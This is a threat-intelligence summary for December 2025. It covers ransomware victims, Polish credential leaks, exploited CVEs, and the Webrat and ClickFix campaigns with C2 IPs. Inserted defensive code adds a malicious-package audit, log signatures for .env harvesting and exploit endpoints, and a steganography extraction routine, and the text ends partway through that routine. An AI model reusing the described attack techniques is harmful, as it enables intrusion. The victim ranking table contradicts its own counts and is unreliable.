
Threats Summary December 2025

December 2025 threat intelligence - ransomware landscape, Poland-focused analysis, dark web monitoring, vulnerability exploitation, supply-chain attacks, malicious packages, browser extensions, emerging malware trends, honeypot data, and campaign analysis with IOCs.

Threat intelligence summary based on real-time data from Baysec CTI and complementary open-source intelligence sources. Analysis accelerated by Baysec Intelligence AI.


Table of Contents

  1. BLUF (Bottom Line Up Front)
  2. Executive Summary
  3. Key Trends Observed
  4. Regional Focus: Poland
  5. Dark Web & Breach Intelligence
  6. Vulnerability Intelligence
  7. Campaign Analysis
  8. Malware Inventory
  9. Technical Appendix: Honeypot Intelligence
  10. MITRE ATT&CK Mapping
  11. Indicators of Compromise
  12. Recommendations
  13. Assessment Confidence Levels
  14. Conclusion
  15. References

BLUF (Bottom Line Up Front)

Supply-chain attacks via trusted platforms (GitHub, npm, PyPI) and critical vulnerabilities with active exploitation dominate December 2025. Patch immediately: PHP CGI (CVE-2024-4577, CISA KEV), React Server Components (CVE-2025-55182), n8n (CVE-2025-68613, 103K exposed). Poland: 4 alleged ransomware victims (LockBit5, SAFEPAY, Qilin, Anubis); 2.5M+ Polish credentials leaked. See Indicators of Compromise for blocklist.


Executive Summary

Supply-chain attacks, weaponized open-source repositories, and increasingly evasive malware dominate the current threat landscape. Threat actors abuse legitimate platforms (GitHub, npm, PyPI, Chrome Web Store) to reach developers, security researchers, and ordinary users.

Key Developments

  • Fake exploit repositories distributing Webrat RAT via GitHub, targeting security researchers with lures for recent CVEs
  • Malicious npm package (lotusbail) - 56K+ downloads, hijacks WhatsApp sessions via hardcoded pairing codes; attacker access persists after package removal
  • Critical n8n vulnerability (CVE-2025-68613, CVSS 9.9) with 103K+ exposed instances and public PoC
  • React2Shell exploitation active (CVE-2025-55182) - 223 attacks from 26 IPs with multiple C2 infrastructure
  • PHP CGI mass exploitation (CVE-2024-4577, CVSS 9.8) - 1,276+ attempts deploying RedTail cryptominer
  • Cisco VPN reconnaissance - coordinated probing of AnyConnect infrastructure from cloud IPs
  • Rondo botnet active - Mirai variant exploiting Shellshock, PHPUnit RCE, and OpenWRT vulnerabilities
  • IoT & network device exploitation (965+ events) - Hikvision cameras (CVE-2021-36260), GPON routers, D-Link devices, QNAP NAS (CVE-2024-21899), Realtek SDK routers (CVE-2021-35395), Docker registries exposed
  • Environment file harvesting - 1,761 requests targeting application secrets and cloud credentials
  • Steganography adoption by ClickFix and GhostPoster campaigns to evade detection
  • macOS targeting increase - signed/notarized malware bypassing Gatekeeper (MacSync Stealer, DriverFixer0428)
  • APT37 active targeting South Korean entities via Artemis campaign

Immediate Actions

  1. Patch critical vulnerabilities: n8n, Next.js/React Server Components, PHP CGI, Apache 2.4.49/2.4.50
  2. Audit dependencies: Remove malicious packages from npm (lotusbail) and PyPI (smtrlib)
  3. Remove browser extensions: GhostPoster Firefox extensions (17 total)
  4. Block C2 infrastructure: See Indicators of Compromise for full blocklist
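The dependency audit in step 2, as an added example that is not part of the original summary or of any of the projects it names: it checks an npm package-lock.json (v1, v2 or v3 layout) and a pip requirements.txt for the package names listed in this report. The page gives the ecosystem only for smtrlib (PyPI) and lotusbail (npm), so every name is checked in both files; the lockfile and requirements content below are constructed samples.

```python
"""Audit an npm lockfile and a pip requirements file for the package names
reported in this summary. Sample inputs below are constructed for the example."""
import json
import re

# Names reported in this summary. The page gives the ecosystem only for smtrlib
# (PyPI) and lotusbail (npm), so every name is checked in both ecosystems.
MALICIOUS_PACKAGES = {"lotusbail", "smtrlib", "runtimeutils", "ai-cypher", "unizip"}


def normalize(name: str) -> str:
    """PEP 503-style normalization: Ai_Cypher, ai.cypher and ai-cypher compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def audit_package_lock(lock_text: str) -> list[str]:
    """Return malicious package names found in a package-lock.json (v1, v2 or v3)."""
    lock = json.loads(lock_text)
    found = set()
    # Lockfile v2/v3: flat "packages" map keyed by install path; nested installs
    # look like node_modules/a/node_modules/b, so take the last segment.
    for path in lock.get("packages", {}):
        if "node_modules/" in path:
            name = path.rsplit("node_modules/", 1)[1]
            if normalize(name) in MALICIOUS_PACKAGES:
                found.add(name)

    # Lockfile v1 (also kept in v2 for compatibility): nested "dependencies" tree.
    def walk(deps: dict) -> None:
        for name, meta in deps.items():
            if normalize(name) in MALICIOUS_PACKAGES:
                found.add(name)
            walk(meta.get("dependencies", {}))

    walk(lock.get("dependencies", {}))
    return sorted(found)


def audit_requirements(req_text: str) -> list[str]:
    """Return malicious package names found in a requirements.txt."""
    found = set()
    for raw in req_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        match = re.match(r"([A-Za-z0-9][A-Za-z0-9._-]*)", line)  # name before any specifier
        if match and normalize(match.group(1)) in MALICIOUS_PACKAGES:
            found.add(match.group(1))
    return sorted(found)


# Constructed sample inputs (not real project files).
SAMPLE_PACKAGE_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"express": "^4.18.0", "lotusbail": "^1.0.0"}},
        "node_modules/express": {"version": "4.18.2"},
        "node_modules/lotusbail": {"version": "1.0.3"},
        "node_modules/express/node_modules/unizip": {"version": "0.1.0"},
    },
})

SAMPLE_REQUIREMENTS = """\
requests==2.32.0
smtrlib>=0.2      # constructed: typosquat named in the summary
-r other.txt
flask
"""

if __name__ == "__main__":
    print("npm hits:", audit_package_lock(SAMPLE_PACKAGE_LOCK))   # ['lotusbail', 'unizip']
    print("PyPI hits:", audit_requirements(SAMPLE_REQUIREMENTS))  # ['smtrlib']
```

Run it against the real package-lock.json and requirements.txt of each repository rather than only the top-level manifest: the lockfile is where a transitively pulled-in package such as the nested unizip entry shows up.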

Honeypot Intelligence

11 days of data (Dec 17-27) | 12.3M+ total events captured

Baysec sensors detected persistent exploitation across multiple protocols:

  • SMB/Windows: 1.5M+ authentication events capturing NTLMv2 hashes
  • SSH: 395K+ brute force attempts including Mirai botnet signatures and Solana validator targeting
  • Web exploitation: React2Shell (223), PHP CGI (1,276), PHPUnit RCE (483), environment file harvesting (1,761)
  • Infrastructure probing: Cisco VPN (73), SMTP open relay abuse (2,600; attackers actively seek mail servers to use as phishing infrastructure), DNS reconnaissance (1,355)

Persistent threat sources: Russia (1.1M+ events) and Egypt (2.4M+ events) dominate attack traffic, with captured credentials revealing compromised corporate Active Directory environments.

Poland Assessment

Ransomware groups listed 4 organizations on leak sites: LockBit5 (mostykatowice.pl, Dec 26), SAFEPAY (polhun.pl, Dec 24-25), Qilin (PODOVIA, Dec 17), Anubis (Duhabex, Dec 5). Verified active threat actors: LockBit5, nova (RALord RaaS) with 10 victims.

Credential exposure: Baysec tracked 2.5M+ Polish credentials across December dumps and combolists; targeted combolists for Polish email providers appearing daily.

Dark Web Monitoring

Baysec CTI discovered 10 new ransomware leak sites in December: evolution, waissbein, osiris, black shrantac, ms13-089, minteye, dark shinigami, cry0, akirat, rustylocker.


Key Trends Observed

| Trend | Description | Examples / Indicators |
|---|---|---|
| Supply-chain attacks via package repositories | Threat actors upload malicious packages to PyPI and npm that steal credentials or download secondary payloads. Attackers use typosquatting, native extensions, or install-time execution. | smtrlib (PyPI), lotusbail (npm, 56k+ downloads), runtimeutils, ai-cypher, unizip |
| Malware-laced browser extensions | Extensions in Chrome Web Store and Firefox Add-ons posing as VPNs/productivity tools intercept traffic and harvest credentials. | Phantom Shuttle (Chrome), GhostPoster (Firefox, 17 extensions, 50k+ downloads) |
| GitHub as malware distribution | Repositories pretending to be exploits for high-profile CVEs lure security researchers. AI-generated descriptions and password-protected archives drop malware. | Webrat campaigns (CVE-2025-59295, CVE-2025-10294) |
| Steganography & evasion | Threat actors hide malicious code inside image files. macOS stealers shift to signed/notarized Swift applications. | ClickFix (LummaC2, Rhadamanthys), MacSync Stealer |
| Multi-platform credential stealers | Infostealers targeting macOS and Windows via fake updates, game cheats, or cracked software. | DriverFixer0428 (DPRK), Odyssey infostealer |
| Infostealer ecosystem at critical mass | Infostealer logs flood dark web markets daily. Threat actors trade fresh credentials within hours of theft. Lumma, Redline, Vidar, Raccoon dominate. Corporate VPN/SSO credentials fuel ransomware initial access. | Daily credential dumps on Russian Market, Genesis Market successors; Polish email providers heavily targeted |
| Ransomware activity | Baysec CTI tracks new ransomware families in intelligence feeds. | Abyss, Underground ransomware |
| Rapid CVE weaponization | Flood of GitHub Gist-hosted PoC exploits for recently disclosed vulnerabilities. | CVE-2025-68613 (n8n RCE, CVSS 9.9), CVE-2025-67443, CVE-2025-62094 |
| APT social-engineering | North Korean APT37 impersonates Korean TV writers to deliver malicious HWP documents. | Artemis campaign |
| Multi-stage operations | Campaigns use several stages (fake updates -> stego-loaded images -> manual execution) to evade detection. | ClickFix campaign |
| Developer targeting | Malicious packages and fake exploit repos aim at inexperienced security professionals. | Webrat’s pivot from game cheats to “exploit” repositories |
| Mass credential harvesting & phishing infrastructure | High-volume SSH brute force (366K+) and SMB authentication capture (1.4M+) targeting Windows/Linux infrastructure. SMTP honeypots detected 2,582 phishing distribution attempts - open relay abuse for financial and crypto scam campaigns. Egypt (2.4M+ events) and Russia (1.1M+ events) are persistent sources. | Baysec sensors: Russia: 1C:Enterprise credentials (USR1CV8); top SSH: root/123456, Mirai (345gs5662d34), Solana targeting (sol, solana, solv) |

Regional Focus: Poland

Intrusion-Sets Targeting Poland (December 2025)

Ransomware / Major Threat Groups

| Threat Actor | Type | December 2025 Status | Notes |
|---|---|---|---|
| LockBit5 | RaaS | VERIFIED (Dec 26, 2025) | Listed mostykatowice.pl on leak site |
| nova (formerly RALord) | RaaS | VERIFIED (10 victims Dec 2025) | Ransomware-as-a-Service; includes TELE-FONIKA Cable Americas (Dec 9) |
| SAFEPAY | Ransomware | VERIFIED (leak site listing) | Listed polhun.pl on Dec 24-25 |
| Qilin | RaaS | VERIFIED (leak site listing) | Listed PODOVIA on Dec 17 |
| Anubis | Ransomware | VERIFIED (leak site listing) | Listed Duhabex on Dec 5 |

Hacktivist / Defacement Groups

| Threat Actor | Type | December 2025 Status |
|---|---|---|
| Perun Svaroga | Hacktivist | VERIFIED and ACTIVE (Dec 7, 2025) |
| NoName057(16) | Pro-Russia DDoS | Active globally (10 attacks Dec 2025) - shifted focus away from Poland to France, Belgium, Denmark, Ukraine |
| Tunisian Maskers Cyber Force | Hacktivist | Targeting Poland (unverified Dec 2025) |
| RABBIT CYBER TEAM | Hacktivist | Targeting Poland (unverified Dec 2025) |
| D4RK 4RMY | Hacktivist | Previously active (last: Aug 2025) |
| SECT0R 16 | Hacktivist | Targeting Poland (unverified Dec 2025) |
| Z-ALLIANCE | Hacktivist | Previously active (last: Sep 2025) |
| UNIT 1948 | Hacktivist | Previously active (last: Aug 2025) |
| R3V0XAn0nymous | Hacktivist | Previously active (last: Jun 2025) |
| BlackH0le | Hacktivist | Targeting Poland (unverified Dec 2025) |
| Black Ember | Hacktivist | Targeting Poland (unverified Dec 2025) |
| Mr Root | Hacktivist | Targeting Poland (unverified Dec 2025) |

Data Brokers & Initial Access Sellers

| Actor | Focus | December 2025 Status |
|---|---|---|
| hitesh, Wieko, shamirrrrious, arsanelupin222 | General data brokerage | Active on forums |
| aisdata, BioHack, corptoday | Corporate/sector data | Active on forums |
| Bestcombo | Combolist vendor | Active on forums |
| telecoms | Telecom-specific data | Active on forums |
| KontrolaPracy | Polish-focused | Previously active (last: Jun 2025) |
| Cebulkowicz | Polish-focused | Previously active (last: May 2025) |

Alleged Ransomware Victims (Poland - December 2025)

DISCLAIMER: Ransomware groups listed the following organizations on their leak sites. Inclusion here indicates the threat actors claim to have compromised these organizations. This does not constitute confirmation of a successful breach - threat actors may have incorrectly listed organizations, victims may have paid ransom (data removed then re-added), or threat actors may have fabricated listings for reputation purposes.

| Organization | Threat Actor | Date Listed | Leak Site Status |
|---|---|---|---|
| mostykatowice.pl (construction) | LockBit5 | Dec 26, 2025 | Listed on leak site |
| polhun.pl (chemical manufacturer) | SAFEPAY | Dec 24-25, 2025 | Data allegedly posted |
| PODOVIA | Qilin | Dec 17, 2025 | Listed on leak site |
| Duhabex | Anubis | Dec 5, 2025 | Listed on leak site |

Analyst Note: Four distinct ransomware groups listed Polish organizations on their leak sites in December 2025. LockBit5 continues the LockBit franchise post-Operation Cronos; Qilin is a sophisticated RaaS operator with global reach; SAFEPAY and Anubis are mid-tier operators.


Dark Web & Breach Intelligence

December 2025 Ransomware Landscape

December 2025 Statistics: 781 confirmed victims across 58 ransomware groups

Most Active Ransomware Groups (December 2025)

| Rank | Group | Victims |
|---|---|---|
| 1 | Qilin | 122 |
| 2 | Kairos | 88 |
| 3 | Devman | 264 |
| 4 | Akira | 64 |
| 5 | Sinobi | 48 |
| 6 | LockBit5 | 45 |
| 7 | SafePay | 43 |
| 8 | DragonForce | 28 |
| 9 | INC Ransom | 25 |
| 10 | Coinbase Cartel | 17 |
| 11 | Everest | 15 |
| 12 | Direwolf | 14 |
| 13 | Lynx | 13 |
| 14 | Play | 12 |
| 15 | WorldLeaks | 11 |
| 16 | The Gentlemen | 11 |

Critical Global Incidents

| Date | Victim | Group | Data | Impact |
|---|---|---|---|---|
| Dec 25 | Wall Street English | INC Ransom | 3.5 TB | Global language academy |
| Dec 25 | The Salvation Army | Interlock | Unknown | Humanitarian org |
| Dec 24 | NCR, Tri-State Metal, Prime Label | DragonForce | Unknown | Multi-victim |
| Dec 22-23 | Romanian Waters Authority | BitLocker | 1,000 systems | Critical infrastructure |
| Dec 22 | University of Phoenix | Clop | 3.5M individuals | Oracle EBS exploit |
| Dec 19 | Gladinet CentreStack | Clop | 59K servers | Mass exploitation |

New Ransomware Leak Sites (December 2025)

| Group | Status |
|---|---|
| evolution | ACTIVE |
| waissbein | ACTIVE |
| osiris | ACTIVE |
| black shrantac | ACTIVE |
| ms13-089 | ACTIVE |
| dark shinigami | ACTIVE |
| cry0 | ACTIVE |
| akirat | ACTIVE |
| rustylocker | ACTIVE |
| minteye | ACTIVE |

Ransomware Tool Leaks

| Date | Leak | Forum | Risk |
|---|---|---|---|
| Dec 22 | VanHelsing Source | gerki.pw | HIGH |
| Dec 22 | NoCry Builder | xforums.st | MEDIUM |
| Dec 23 | Ransomware Dev Course | niflheim.top | MEDIUM |

Breach Reports & Credential Leaks

Polish Credential Exposure

Baysec CTI tracked credential dumps targeting Polish organizations:

| Source | Volume | Date | Risk |
|---|---|---|---|
| Polish email providers | 2.5M+ combined | Dec 2025 | HIGH |
| Historical breach recirculation | Ongoing | Throughout Dec | MEDIUM |

Major Credential Leaks (Global)

| Source | Records | Type |
|---|---|---|
| wakanim.tv (France) | 6.7M | Anime platform accounts |
| ICMR + Hi-Tek India | Unknown | Healthcare data |
| Fresh Indian Passport + Selfie | Unknown | Identity documents |
| Serasa Experian (Brazil) | Unknown | Credit bureau data |
| LastPass 2022 Vaults | Ongoing (still active in 2025) | Crypto theft via decryption |

Vulnerability Intelligence

Vulnerabilities Used as Lures (Webrat Campaign)

Assessment: Threat actors leverage recently disclosed, high-profile vulnerabilities as social engineering lures, using the following CVEs to create convincing fake exploit repositories.
Confidence: HIGH (based on Kaspersky analysis of 15 malicious repositories)

| CVE Identifier | CVSS | Affected Product | Vulnerability Description | Weaponization Context |
|---|---|---|---|---|
| CVE-2025-59295 | High | Windows MSHTML / Internet Explorer | Heap-based buffer overflow in the MSHTML rendering engine. Attackers can achieve remote code execution by sending specially crafted data over the network that triggers memory corruption. The vulnerability affects the legacy Trident engine still present in Windows for compatibility. | Webrat operators use this as lure in fake GitHub repositories. No legitimate exploit exists in malicious repos - archives contain Webrat dropper instead. |
| CVE-2025-10294 | Critical | OwnID Passwordless Login (WordPress Plugin) | Authentication bypass due to improper validation of the shared secret mechanism. Unauthenticated attackers can log in as arbitrary users, including administrators, without providing credentials. Affects WordPress sites using this popular passwordless authentication plugin. | High interest from WordPress administrators makes this an effective lure. Fake PoCs target security researchers investigating WordPress vulnerabilities. |
| CVE-2025-59230 | High | Windows Remote Access Connection Manager (RasMan) | Elevation-of-privilege vulnerability. A locally authenticated attacker can exploit improper access control in the RasMan service to escalate privileges from standard user to SYSTEM level on affected Windows installations. | Local privilege escalation vulnerabilities attract red teamers and pentesters - ideal target demographic for Webrat operators. |

Analyst Note: The selection of these CVEs demonstrates operational sophistication. All three are recent, have media coverage, and affect widely-deployed products. The Webrat operators specifically chose vulnerabilities that would attract security professionals rather than general users.

Actively Weaponized Vulnerabilities

Assessment: The following vulnerabilities have confirmed public exploits and threat actors actively scan or exploit them in the wild.
Confidence: HIGH (NVD data, Censys scanning data, PoC repositories confirm active exploitation)

| CVE Identifier | CVSS | Affected Product | Vulnerability Description | Exploitation Status | Exposure |
|---|---|---|---|---|---|
| CVE-2024-4577 | 9.8 | PHP CGI (Windows) | Argument Injection leading to RCE. PHP CGI on Windows fails to properly sanitize certain character sequences, allowing attackers to inject arguments and execute arbitrary code. Affects PHP before 8.1.29, 8.2.20, 8.3.8 on Windows with specific locale configurations. | ACTIVELY EXPLOITED. CISA lists in KEV. RedTail cryptominer conducts mass exploitation. EPSS: 94.37%. | Windows PHP CGI deployments |
| CVE-2025-68613 | 9.9 | n8n Workflow Automation (versions 0.211.0 to <1.120.4) | Remote Code Execution via Expression Injection. The n8n platform allows JavaScript expressions inside workflows wrapped in {{ }} syntax, evaluated server-side using Node.js. Insufficient isolation of the expression evaluation context allows authenticated attackers to escape the sandbox and execute arbitrary code with the privileges of the n8n process. Exploitation requires authentication but published PoCs lower the technical barrier significantly. | Public PoC available. Baysec sensors detect active scanning. No confirmed ITW exploitation yet. | 103,476 vulnerable instances (Censys, Dec 22 2025). Majority in US, Germany, France, Brazil, Singapore. |
| CVE-2025-67443 | Medium | Schlix CMS | Cross-Site Scripting (XSS). Insufficient input sanitization allows injection of malicious scripts into web pages viewed by other users. Can be leveraged for session hijacking, credential theft, or further exploitation. | GitHub Gist PoC available. | Unknown |
| CVE-2025-62094 | High | WordPress Plugin (unspecified) | Unauthorized access/code execution in WordPress plugin. Specific technical details pending full disclosure. | GitHub Gist PoC available. | Potentially millions of WordPress installations |
| CVE-2025-55182 | Critical | React Server Components | Remote Code Execution. Improper handling of serialized data in React Server Components implementation allows attackers to execute arbitrary code on the server. Affects applications using vulnerable RSC implementations. | ACTIVELY EXPLOITED. Baysec captured 223 attacks with confirmed C2. | Applications using React Server Components / Next.js |
| CVE-2025-15007 | High | Tenda WH450 Router | Buffer overflow in router firmware. Exploitation allows remote code execution and complete device compromise. Attackers can gain persistent access to network infrastructure. | Trickest-hosted exploit available. | Consumer and SOHO networks |
| CVE-2019-16278 | Critical | Nostromo nhttpd Web Server | Directory traversal and RCE. Path traversal vulnerability allows unauthenticated attackers to execute arbitrary commands on the underlying system. Well-documented and reliable exploitation. | Metasploit module available. Widely exploited. | Legacy web servers |
| CVE-2021-41773 | 9.8 | Apache HTTP Server 2.4.49/2.4.50 | Path Traversal leading to RCE. Improper path normalization allows attackers to map URLs to files outside the expected document root. With mod_cgi enabled, leads to remote code execution. | ACTIVELY EXPLOITED. Baysec captured 402 attempts. | Apache 2.4.49/2.4.50 servers |
| CVE-2017-9841 | 9.8 | PHPUnit | Remote Code Execution via eval-stdin.php. Unprotected eval-stdin.php endpoint in PHPUnit allows unauthenticated attackers to execute arbitrary PHP code. Common in development environments accidentally exposed to production. | ACTIVELY EXPLOITED. Baysec captured 483 attempts. | PHP applications with exposed PHPUnit |
| CVE-2021-36260 | 9.8 | Hikvision IP Cameras | Command Injection via /SDK/webLanguage. Unauthenticated attackers can inject commands via crafted requests to the web management interface. Leads to full device compromise. | ACTIVELY EXPLOITED. Baysec captured 103 attempts. | Hikvision IP cameras/NVRs |
| CVE-2020-3452 | 7.5 | Cisco ASA/FTD (AnyConnect) | Path Traversal. Improper input validation in the web services interface allows unauthenticated attackers to read sensitive files from the device. Can expose configuration and credentials. | ACTIVELY EXPLOITED. Baysec captured 73 probing attempts. | Cisco ASA/FTD with AnyConnect |
| CVE-2014-6271 | 9.8 | GNU Bash (Shellshock) | Remote Code Execution via environment variables. Bash incorrectly processes trailing strings after function definitions, allowing attackers to execute arbitrary commands. Exploited via CGI, SSH, DHCP. | ACTIVELY EXPLOITED. Rondo botnet uses in mass scanning (441+ events). | Linux/Unix systems with exposed Bash |
| CVE-2023-1389 | 8.8 | TP-Link Archer (OpenWRT LuCI) | Command Injection via locale parameter. Unauthenticated attackers can inject commands via the country parameter in the web interface. Leads to full router compromise. | ACTIVELY EXPLOITED. Rondo botnet uses in mass scanning. | TP-Link routers, OpenWRT devices |
| CVE-2025-31324 | 10.0 | SAP NetWeaver | Unauthenticated File Upload. The metadatauploader endpoint allows unauthenticated attackers to upload arbitrary files, leading to remote code execution. | ACTIVELY EXPLOITED. Baysec captured 24 attempts. | SAP NetWeaver deployments |
| CVE-2024-36401 | 9.8 | GeoServer | OGC Filter SQL Injection leading to RCE. Improper evaluation of property names as XPath expressions allows unauthenticated attackers to execute arbitrary code. | ACTIVELY EXPLOITED. Baysec captured 18 attempts. | GeoServer instances |

Priority Assessment:

  1. CRITICAL - CVE-2024-4577: Patch immediately. CISA KEV, EPSS 94.37%, mass exploitation by RedTail. Block 178.16.55.224.
  2. CRITICAL - CVE-2025-55182: Patch immediately. Threat actors actively exploit with confirmed C2 infrastructure. Block 94.154.35.154 and 193.142.147.209.
  3. CRITICAL - CVE-2025-68613: Patch immediately. 103k+ exposed instances with a public PoC represent significant risk.
  4. MEDIUM - Other CVEs: Monitor for exploitation; patch during normal maintenance windows.
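Detection logic for the web-facing endpoints named in this summary (the environment-file harvesting counted by the honeypot sensors, and the eval-stdin.php, /SDK/webLanguage and metadatauploader endpoints from the table above), as an added example that is not part of the original report or of any Baysec tooling. It parses access-log lines in the Apache/nginx combined format, matches each signature against the percent-decoded path so a `%2E` in place of a dot does not hide a request, and tallies hits by signature and by source. The log lines are constructed for the example and use RFC 5737 documentation addresses; the signature set and names are this example's own, not the sensor signatures.

```python
"""Flag web requests for the endpoints named in this summary. Log lines below are
constructed for the example (RFC 5737 documentation addresses, not real sources)."""
import re
from collections import Counter
from urllib.parse import unquote

# Combined log format: ip ident user [time] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Each signature is matched against the percent-decoded request path.
SIGNATURES = [
    ("env-file-harvesting", re.compile(r"/\.env\b", re.I)),
    ("CVE-2017-9841 PHPUnit eval-stdin.php", re.compile(r"eval-stdin\.php", re.I)),
    ("CVE-2021-36260 Hikvision /SDK/webLanguage", re.compile(r"/SDK/webLanguage", re.I)),
    ("CVE-2025-31324 SAP metadatauploader", re.compile(r"metadatauploader", re.I)),
]


def classify(path: str) -> list[str]:
    """Names of every signature the decoded request path matches."""
    decoded = unquote(path)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def analyze(log_text: str) -> list[tuple[str, str, list[str]]]:
    """(source ip, raw path, matched signatures) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        tags = classify(m["path"])
        if tags:
            hits.append((m["ip"], m["path"], tags))
    return hits


def count_by_signature(hits) -> Counter:
    """How often each signature fired."""
    return Counter(tag for _, _, tags in hits for tag in tags)


def count_by_source(hits) -> Counter:
    """How many suspicious requests each source address sent."""
    return Counter(ip for ip, _, _ in hits)


# Constructed sample log: three probes from one source, two from another,
# one SAP probe, and two benign requests that must not match.
SAMPLE_LOG = """\
203.0.113.10 - - [22/Dec/2025:10:15:02 +0000] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.10 - - [22/Dec/2025:10:15:03 +0000] "GET /api/.env.bak HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.10 - - [22/Dec/2025:10:15:04 +0000] "GET /%2Eenv HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.7 - - [22/Dec/2025:10:16:41 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "python-requests/2.31"
198.51.100.7 - - [22/Dec/2025:10:16:42 +0000] "PUT /SDK/webLanguage HTTP/1.1" 404 196 "-" "python-requests/2.31"
203.0.113.44 - - [22/Dec/2025:10:20:09 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 404 196 "-" "curl/8.4.0"
198.51.100.200 - - [22/Dec/2025:10:21:00 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.200 - - [22/Dec/2025:10:21:01 +0000] "GET /static/env.js HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    hits = analyze(SAMPLE_LOG)
    for ip, path, tags in hits:
        print(f"{ip:16} {path:55} {', '.join(tags)}")
    print(count_by_signature(hits))
    print(count_by_source(hits))
```

A 404 on these paths still matters: the sources probing them are the ones to feed into the blocklist, and a 200 on any of them is an incident, not a detection.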

Campaign Analysis

Campaign: Webrat RAT via Fake GitHub Exploits

Attribution: Unknown criminal actor (likely financially motivated)
Confidence: HIGH
First Observed: May 2025 (game cheats); September 2025 (pivot to fake exploits)
Status: ACTIVE (GitHub removed repositories, but operators will likely create new ones)

Summary: Kaspersky researchers discovered 15 malicious GitHub repositories distributing Webrat malware disguised as PoC exploits for the high-profile vulnerabilities documented above.

Targeting: Originally gamers (Rust, Counter-Strike, Roblox cheats). Since September 2025, operators pivoted to security researchers and students - likely to access more valuable credentials and potentially compromise security tooling.

Technical Execution:

Phase 1: Initial Access

  • Victim discovers GitHub repository claiming PoC for CVE-2025-XXXXX
  • Repository contains AI-generated README with convincing technical details
  • Operators offer password-protected archive for download

Phase 2: Execution

  • Victim extracts and executes rasmanesc.exe
  • Dropper attempts privilege escalation
  • Dropper disables Windows Defender via registry/policy manipulation
  • Dropper downloads Webrat payload from hardcoded C2 URL

Phase 3: Actions on Objectives

  • Exfiltrates cryptocurrency wallets
  • Steals Steam/Discord/Telegram credentials
  • Enables webcam surveillance
  • Captures screenshots
  • Logs keystrokes for additional credential harvesting

Indicators:

  • Password-protected archives in GitHub repositories
  • AI-generated README content (generic phrasing, formatting inconsistencies)
  • File: rasmanesc.exe (dropper)
  • Targeting recently disclosed CVEs with media coverage

Campaign: ClickFix Steganography

Attribution: Unknown criminal actor
Confidence: HIGH
First Observed: October 2025
Status: ACTIVE (infrastructure partially disrupted by Operation Endgame, November 2025)

Summary: Huntress documented a multi-stage attack combining social engineering with steganography. Security researchers have tracked the campaign since October 2025. Attackers embed malicious payloads in images and trick users into executing PowerShell commands.

Technical Execution:

Phase 1: Social Engineering (ClickFix)

  • Victim encounters fake Windows Update full-screen interface
  • Interface instructs user to press Win+R
  • Malware auto-pastes malicious command from clipboard
  • User executes MSHTA payload

Phase 2: Payload Retrieval

  • MSHTA contacts C2 at 141.98.80.175
  • MSHTA downloads and executes PowerShell script
  • PowerShell retrieves PNG images containing hidden payloads

Phase 3: Steganography Extraction

  • Custom algorithm targets red channel of BGRA pixel data
  • Extracts shellcode by XORing calculated values with red channel bytes
  • XOR key: 114
  • Loader injects decrypted shellcode into memory

Phase 4: Execution

  • Donut-packed payload executes entirely in memory
  • Malware creates no disk artifacts
  • ctrampoline technique: 10,000 empty function calls to evade analysis
  • Final payload: LummaC2 or Rhadamanthys infostealer

Evasion Assessment: SOPHISTICATED

  • Memory-only execution defeats file-based detection
  • Steganography bypasses network content inspection
  • ctrampoline technique complicates dynamic analysis
  • Legitimate-appearing image files avoid suspicion

Infrastructure:

  • C2: 141.98.80.175 (MSHTA stages, PowerShell loaders)
  • Payload delivery: PNG images on attacker-controlled servers

Payloads: LummaC2, Rhadamanthys
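The red-channel extraction in Phase 3 and a channel-entropy triage check, as an added example for analysts that is not part of the original report and not the loader's own code. The report states only that the loader XORs values with the red channel bytes of BGRA pixel data using key 114; the 4-byte length prefix used here is this example's own framing, labelled as an assumption in the code, and the carrier image is a constructed flat-colour sample built solely so the example has something to decode. The entropy check goes beyond the report: in a flat or smooth image a payload-bearing red channel is far noisier than the blue and green channels, which gives a quick first-pass signal before any decoding is attempted.

```python
"""Red-channel extraction and a per-channel entropy check for the ClickFix
steganography described above. The carrier built here is a constructed sample."""
import math
from collections import Counter

XOR_KEY = 114  # key reported for the ClickFix loader


def red_channel(bgra: bytes) -> bytes:
    """Red is byte 2 of every 4-byte BGRA pixel."""
    if len(bgra) % 4:
        raise ValueError("BGRA buffer length must be a multiple of 4")
    return bgra[2::4]


def extract_payload(bgra: bytes, key: int = XOR_KEY) -> bytes:
    """XOR the red channel with the key and strip the framing.
    Assumption (not from the report): the decoded stream starts with a 4-byte
    little-endian length; the report only states that values are XORed with 114."""
    decoded = bytes(b ^ key for b in red_channel(bgra))
    if len(decoded) < 4:
        raise ValueError("carrier too small for a length prefix")
    n = int.from_bytes(decoded[:4], "little")
    if n > len(decoded) - 4:
        raise ValueError("length prefix exceeds carrier capacity")
    return decoded[4:4 + n]


def channel_entropy(bgra: bytes) -> dict[str, float]:
    """Shannon entropy (bits per byte) of each of the four channels."""
    result = {}
    for name, offset in (("B", 0), ("G", 1), ("R", 2), ("A", 3)):
        chan = bgra[offset::4]
        total = len(chan)
        result[name] = -sum(c / total * math.log2(c / total) for c in Counter(chan).values())
    return result


def looks_like_carrier(bgra: bytes, margin: float = 2.0) -> bool:
    """Triage heuristic: a payload-bearing red channel is far noisier than B and G."""
    e = channel_entropy(bgra)
    return e["R"] - max(e["B"], e["G"]) >= margin


def build_sample_carrier(payload: bytes, width: int, height: int, key: int = XOR_KEY) -> bytes:
    """Construct a flat-colour BGRA image whose red channel carries the payload.
    Exists only so the example has a test input."""
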